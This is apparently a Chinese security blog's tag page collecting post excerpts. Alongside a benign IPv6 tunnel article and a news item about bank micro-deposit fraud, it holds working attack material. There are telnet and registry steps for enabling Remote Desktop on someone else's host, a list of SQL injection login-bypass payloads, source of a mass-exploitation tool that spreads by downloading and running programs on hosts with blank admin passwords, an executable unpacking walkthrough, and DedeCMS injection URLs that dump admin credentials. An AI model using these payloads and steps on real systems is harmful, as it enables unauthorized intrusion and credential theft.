Posts tagged 利用
利用隧道感受IPV6
九 15th
级别: 中级
马 路遥 (maluyao@163.com), 工程师, 北京生命科学研究所,黄牛博士实验室
2007 年 8 月 23 日
本文简单介绍了IPV6的相关知识,描述了如何通过Hurricane Electric提供的免费IPV6隧道,连接到IPV6网络的方法。
IPV6 是新一代网络技术,提供 2128的超大地址空间,换算成十进制就是 3.4×1038。相当于地球上每平方米有 6.7×1023个地址(对比一下,阿佛加德罗常数是 6.02×1023,是一升气体所含的分子数)。和 IPV4 相似,IPV6 地址也会有所浪费,但即使最保守的估计,每平方米也有 1600 个地址。在可以预见的将来,完全能满足人类的需求。
主流的操作系统的最新版本,例如 Linux、Windows、FreeBSD、OpenBSD、NetBSD、Solaris、Aix,以及 Cisco、Juniper 和华为等公司生产的路由器,目前都已经能够支持 IPV6 了。
IPV6 和 IPV4 最明显的区别,当然就在于地址的长度不同。IPV4 中 IP 地址的长度是 32 位,有 232 -1 个地址,IPV4 的地址长度为 128 位,有 2128 -1 个地址。
黑客利用银行漏洞窃5万美元
六 4th
文章来源: 中国计算机安全
国外媒体报道,一位“黑客”利用银行漏洞从PayPal、Google Checkout和其它在线支付公司窃取了5万多美元,每次只偷几美分。他所利用的漏洞是:银行在开户后一般会向帐号发送小额钱去验证帐户是否有效,数额一般在几美分到几美元左右。
Google Checkout和Paypal也使用相同的方法去检验与在线帐号捆绑的信用卡和借记卡帐号。根据法庭公文,加利福尼亚人Michael Largent用一个自动脚本开了58,000个帐号,收集了数以千计的超小额费用,汇入到几个个人银行账户中去。
他从Google Checkout服务骗到了,000以上的现金。银行注意到了这种奇怪的现金流动,和他取得联系,Largent解释他仔细阅读过相关服务条款,相信自己没做错事,声称需要钱去偿还债务。
但Largent使用了假名,包括卡通人物的名字,假的地址和社会保障号码,因此了违反了邮件、银行和电信欺骗法律。Largent目前已被保释。 千万别在中国尝试,这是要判无期徒刑的。
利用telnet—开3389端口
五 8th
利用telnet—–开3389端口
如果对方的端口有开放:
telnet 192.168.0.1
输入用户名/密码
C:\>
\\成功进入!!!!
进入后,再次检查终端组件是否安装:
c:\>query user
这个工具需要安装终端服务.
这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 . 2002-1-12 22:5
\\类似这样的信息,可能组件就已安装.
好!都清楚了,可以开始安装了.
—————————————————
C:\>dir c:\sysoc.inf /s //检查INF文件的位置
c:\WINNT\inf 的目录
2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
—————————————————–
C:\> dir c:\sysocmgr.* /s //检查组件安装程序
c:\WINNT\system32 的目录
2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
—————————————————–
c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
//这是建立无人参与的安装参数
c:\>type c:\wawa
[Components]
TSEnable = on
//检查参数文件
——————————————————
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
—————————————————–
这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起.
如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,
3389终端服务就已经开启.你就可以连上去了.
这里还有两种方法
第一种开启的办法:
使用DameWare Mini Remote Control远程连接上,
在”终端服务配置”里,重新启用RDP连接,马上就可以使用3389了.
第二种开启的办法:
修改远程注册表.
比如:
主机IP: 192.168.0.1
已有的帐号和密码: wawa/7788
首先与远程主机建立连接
net use \\192.168.0.1\ipc$ “7788″ /user:”wawa”
再打开本机注册表
“开始”==>”运行”==>regedit
在”注册表”下拉菜单中选择”连接网络注册表”
在”计算机名”中输入 \\192.168.0.1
这样就进入了远程主机注册表.
现在我们找到这里:
hkey_local_machine\system\currentcontrolset\control\terminal server\winstations\rdp-tcp\fEnableWinStation
将fEnableWinStation值由0改为1
———–============————============——–==========
SQLEXEC或telnet进入后,检查终端组件是否安装:
c:\>query user
这个工具需要安装终端服务.
这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 . 2002-1-12 22:5
\\类似这样的信息,可能组件就已安装.
好!都清楚了,可以开始安装了.
—————————————————
C:\>dir c:\sysoc.inf /s //检查INF文件的位置
c:\WINNT\inf 的目录
2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
—————————————————–
C:\> dir c:\sysocmgr.* /s //检查组件安装程序
c:\WINNT\system32 的目录
2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
—————————————————–
c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
//这是建立无人参与的安装参数
c:\>type c:\wawa
[Components]
TSEnable = on
//检查参数文件
——————————————————
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
—————————————————–
这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起.
如果一切正常的话,几分钟后对方主机将会离线,当它重新回
利用OR突破登陆密码进入后台集合
五 3rd
利用OR突破登陆密码进入后台集合
‘) OR (‘a’ = ‘a
‘) OR (‘1′-’1
‘or”=’
‘ OR ‘1=1
admin’–
‘ or 0=0 —
” or 0=0 —
or 0=0 —
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 —
hi’ or 1=1 —
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”a
‘ or 1=1–
or a=a–
‘ or 1=1–
1′ having ‘1′=’1′–
‘ or ‘x’='x–
foo’+OR+’1′=’1
‘ having 1=1–
Goldsword——全自动扫描漏洞利用工具
三 8th
我博客很少推荐什么东西,一般每次推荐都是推荐一些比较特别的东西,这次也不例外,是今天去看暗组偶然看到的,咋一看,很牛叉的工具,集合了几个经典漏洞的利用,推荐给大家使用,很郁闷,我一运行就自动安装office 2003 !
GOLDSWORD功能介绍和使用说明 作者:金刀客 MD5:9f80c3b1e7f5f6f7d0c8aea25fe83551 goldsword.exe
Option Explicit
Private Sub Form_Load()
On Error Resume Next
Dim i%
text1.Text = " GOLDSWORD是一款全自动扫描漏洞利用工具,主要是利用用户名为Administrator,密码为空的远程主机。仅仅用于交流学习,请勿用于非法用途!" _
+ " 1,绿色软件,不向别的目录和注册表写入任何数据。" _
+ " 2,无法判断NTscan扫描是否完成,所以务必手动关闭它,否则程序将一直等待!"
text2.Text = "本版本主要更新如下:" _
+ " 1,更新ftpwmi135,httpwmi135,tftpwmi135核心代码,成功率更高。" _
+ " 2,更新RTCS批量溢出代码,当远程主机telnet开启时不再关闭。" _
+ " 3,增加了IPC批量135,先默认共享c盘,然后复制执行文件。" _
+ " 4,增加自动获取内网和公网IP功能。" _
+ " 5,增加关闭S扫描器的功能。" _
+ " 6,优化代码,解决占用cpu高的问题。"
For i = 1 To 8
If (i = 1) Then
Label11.Caption = "绿岛批量135,先S扫描135,然后NTSCAN过滤弱口令,最后让绿岛下载运行程序."
ElseIf (i = 2) Then
Label12.Caption = "RPMD批量135:利用的RPMD.VBE脚本来实现下载运行程序。"
ElseIf (i = 3) Then
Label13.Caption = "FTPWMI135:先连接远程主机然后登陆FTP服务器下载程序运行。"
ElseIf (i = 4) Then
Label11.Caption = "HTTPWMI135:利用wmi在远程主机写入脚本下载者然后运行。"
ElseIf (i = 5) Then
Label11.Caption = "TFTPWMI135:利用WMI在远程主机执行TFTP命令来下载运行程序。"
ElseIf (i = 6) Then
Label11.Caption = "1433批量溢出:扫描出1433后用sqlhello.exe溢出得到shell。"
ElseIf (i = 7) Then
Label11.Caption = "42批量溢出:扫描出42后用ms.exe溢出得到shell。"
ElseIf (i = 
Then
Label11.Caption = "RTCS批量溢出:利用RTCS.vbe批量开telnet。"
End If
Next i
End Sub
利用ESP定律快速脱壳(PECompact 2.x)
一 22nd
先载入主程序
来到
00404BB8 B8 B0905F00 mov eax,MP3Exper.005F90B0
00404BBD 50 push eax
00404BBE 64:FF35 00000000 push dword ptr fs:[0]
00404BC5 64:8925 00000000 mov dword ptr fs:[0],esp —————->看这个
00404BCC 33C0 xor eax,eax
00404BCE 8908 mov dword ptr ds:[eax],ecx
00404BD0 50 push eax
00404BD1 45 inc ebp
00404BD2 43 inc ebx
一。运用esp定律[separator]
1.f8单步运行到00404BC5
看右边窗口的esp值,我这里是0012ffbc
2.好下命令 d 0012ffbc
我们发现下方的转存窗口有所变化出现:
0012FFBC E0 FF 12 00 B0 90 5F 00 ? .皭_.
0012FFC4 4F 6D 81 7C 38 07 93 7C Om亅8 搢
在0012FFBC的4个字节下下硬件写入->DWord 断点(也就是在E0 FF 12 00上下)
f9运行程序
二.找oep
运行后断在
005F90E4 51 push ecx
005F90E5 57 push edi
005F90E6 56 push esi
005F90E7 52 push edx
观察一下,不是oep阿,奇怪(这里不懂,望高手指点)
向下翻
005F915D 8985 D0120010 mov dword ptr ss:[ebp+100012D0],eax
005F9163 8BF0 mov esi,eax
005F9165 59 pop ecx
005F9166 5A pop edx
005F9167 EB 0C jmp short MP3Exper.005F9175
005F9169 03CA add ecx,edx
005F916B 68 00800000 push 8000
005F9170 6A 00 push 0
005F9172 57 push edi
005F9173 FF11 call dword ptr ds:[ecx]
005F9175 8BC6 mov eax,esi
005F9177 5A pop edx
005F9178 5E pop esi
005F9179 5F pop edi
005F917A 59 pop ecx
005F917B 5B pop ebx
005F917C 5D pop ebp
005F917D FFE0 jmp eax—————>关键代码
005F917F 0000 add byte ptr ds:[eax],al
005F9181 0000 add byte ptr ds:[eax],al
在005F917D FFE0 jmp eax—————>关键代码上下断点
f9运行,断下,在f8单步运行一下,到了—oep
00404BB8 M> 68 682A4700 push MP3Exper.00472A68 ; ASCII “VB5!6&vb6chs.dll”
00404BBD E8 F0FFFFFF call MP3Exper.00404BB2 ; jmp to MSVBVM60.ThunRTMain
00404BC2 0000 add byte ptr ds:[eax],al
00404BC4 98 cwde
00404BC5 0000 add byte ptr ds:[eax],al
三.dump and修复
拿出lordPE选择文件,full dump
此时不要关闭od,拿出importREC,选取进程,oep填 00404bb8-400000= 4bb8填4bb8
点自动搜索ita,再点获取输入表,发现函数都有效,最后点修复抓取文件,save…..
脱壳到此结束,谢谢大家看完
DEDECMS最新注射漏洞利用工具
一 11th
软件利用:
漏洞出现在buy_action.php 没有对pid传递进行足够的重视
导致出现SQL注射问题!
注册地址:
/member/index_do.php?fmdo=user&dopost=regnew
爆管理帐号:
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%23@__admin/*
爆管理员密码
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*
Power by DedeCms
DEDECMS最新注射漏洞利用工具.rar